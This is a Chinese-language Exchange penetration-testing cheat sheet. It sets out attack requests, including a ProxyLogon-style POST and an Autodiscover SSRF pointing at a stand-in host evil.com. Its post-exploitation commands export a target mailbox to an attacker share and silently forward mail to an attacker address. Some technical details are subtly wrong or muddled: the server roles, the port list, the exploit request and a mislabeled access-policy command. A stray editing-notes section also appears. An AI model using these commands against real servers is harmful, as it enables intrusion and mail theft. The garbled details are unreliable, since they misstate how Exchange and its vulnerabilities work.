Exchange服务器渗透测试技术总结

一、Exchange服务器基础认知

1.1 Exchange服务器角色演变

• Exchange Server 2010：包含五个服务器角色
• Exchange Server 2013：精简为三个服务器角色
  • 邮箱服务器(Mailbox Server)：负责认证、重定向、代理客户端连接请求
  • 客户端访问服务器(Client Access Server)
  • 边缘传输服务器(Edge Transport Server)

二、Exchange信息收集技术

2.1 SPN查询技术

# 使用PowerShell查询Exchange服务
setspn -T domain.com -Q */*

2.2 端口扫描识别

常见Exchange服务端口：

• 25 (SMTP)
• 80/443 (HTTP/HTTPS)
• 135 (RPC)
• 445 (SMB)
• 1433 (SQL)
• 5985 (WinRM HTTP)
• 9389 (AD Web服务)

三、Exchange漏洞利用技术

3.1 认证相关漏洞

ProxyLogon漏洞(CVE-2021-26855)

• 利用方式：

  POST /ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory HTTP/1.1
  Host: exchange-server
  Content-Type: text/xml
  X-BEResource: 服务器FQDN/autodiscover/autodiscover.xml?a=~1942062522
  

ProxyShell漏洞链

• CVE-2021-34473 (ACL绕过)
• CVE-2021-34523 (提权)
• CVE-2021-31207 (后门)

3.2 服务端请求伪造(SSRF)

利用Exchange Web Services(EWS)接口

• 通过Autodiscover服务泄露NTLM哈希
• 利用方式：

  GET /autodiscover/autodiscover.xml?@evil.com/
  

四、后渗透技术

4.1 邮箱数据导出

使用PowerShell导出PST文件

New-MailboxExportRequest -Mailbox "目标邮箱" -FilePath "\\攻击机\share\export.pst"

4.2 权限维持技术

添加隐藏转发规则

Set-Mailbox -Identity "目标邮箱" -ForwardingAddress "攻击者邮箱" -DeliverToMailboxAndForward $true

创建隐藏的EWS管理应用

New-ApplicationAccessPolicy -AppId "攻击者AppId" -PolicyScopeGroupId "目标组" -AccessRight RestrictAccess

五、防御检测建议

1. 及时更新补丁：确保Exchange服务器安装最新安全更新
2. 禁用不必要的服务：如Autodiscover、EWS等非必需服务
3. 日志监控：
   • 监控异常Powershell命令执行
   • 监控异常的邮箱导出请求
   • 监控异常的转发规则添加
4. 网络隔离：将Exchange服务器置于DMZ区域，限制内部网络访问

六、常见错误修正

1. SPN查询错误：确保使用正确的查询命令，避免混淆SMB流量监听
2. 图片引用错误：技术文档中图片应与内容严格对应，避免误导

七、参考工具

1. Ruler：Exchange服务器攻击框架
2. MailSniper：Exchange环境信息收集工具
3. PrivExchange：利用Exchange进行域提权
4. Exchange2domain：通过Exchange服务器获取域控权限

注：本文档仅用于安全研究目的，实际测试需获得合法授权。